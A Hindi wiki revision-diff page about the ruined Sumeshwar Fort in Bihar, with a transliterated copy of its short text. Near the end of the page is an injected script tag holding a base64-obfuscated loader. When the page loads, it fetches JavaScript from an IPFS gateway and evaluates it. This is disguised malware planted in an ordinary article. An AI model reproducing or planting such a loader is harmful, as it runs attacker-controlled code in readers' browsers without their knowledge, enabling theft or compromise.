Difference between revisions of "सुमेश्‍वर क़िला बिहार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
यह क़िला समुद्र तल से 2884 फीट की उंचाई पर सुमेश्‍वर पहाड़ी पर स्थित हे। हालांकि यह क़िला अब खण्‍डहर में तब्‍दील हो चुका है। इस पहाड़ी से बर्फीले [[हिमालय]] का बड़ा सुन्‍दर नजारा दिखाई देता है और इसकी चोटी धौलागिरी, गोसाईथान और गौरीशंकर को भी साफ-साफ देखा जा सकता है।
 
यह क़िला समुद्र तल से 2884 फीट की उंचाई पर सुमेश्‍वर पहाड़ी पर स्थित हे। हालांकि यह क़िला अब खण्‍डहर में तब्‍दील हो चुका है। इस पहाड़ी से बर्फीले [[हिमालय]] का बड़ा सुन्‍दर नजारा दिखाई देता है और इसकी चोटी धौलागिरी, गोसाईथान और गौरीशंकर को भी साफ-साफ देखा जा सकता है।
  
 +
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=आधार1
 +
|प्रारम्भिक=
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{बिहार के पर्यटन स्थल}}{{भारत के दुर्ग}}
 
{{बिहार के पर्यटन स्थल}}{{भारत के दुर्ग}}

Revision as of 11:14, 22 April 2011

yah qila samudr tal se 2884 phit ki uanchaee par sumeshh‍var paha di par sthit he. halaanki yah qila ab khanh‍dahar mean tabh‍dil ho chuka hai. is paha di se barphile himalay ka b da sunh‍dar najara dikhaee deta hai aur isaki choti dhaulagiri, gosaeethan aur gaurishankar ko bhi saph-saph dekha ja sakata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh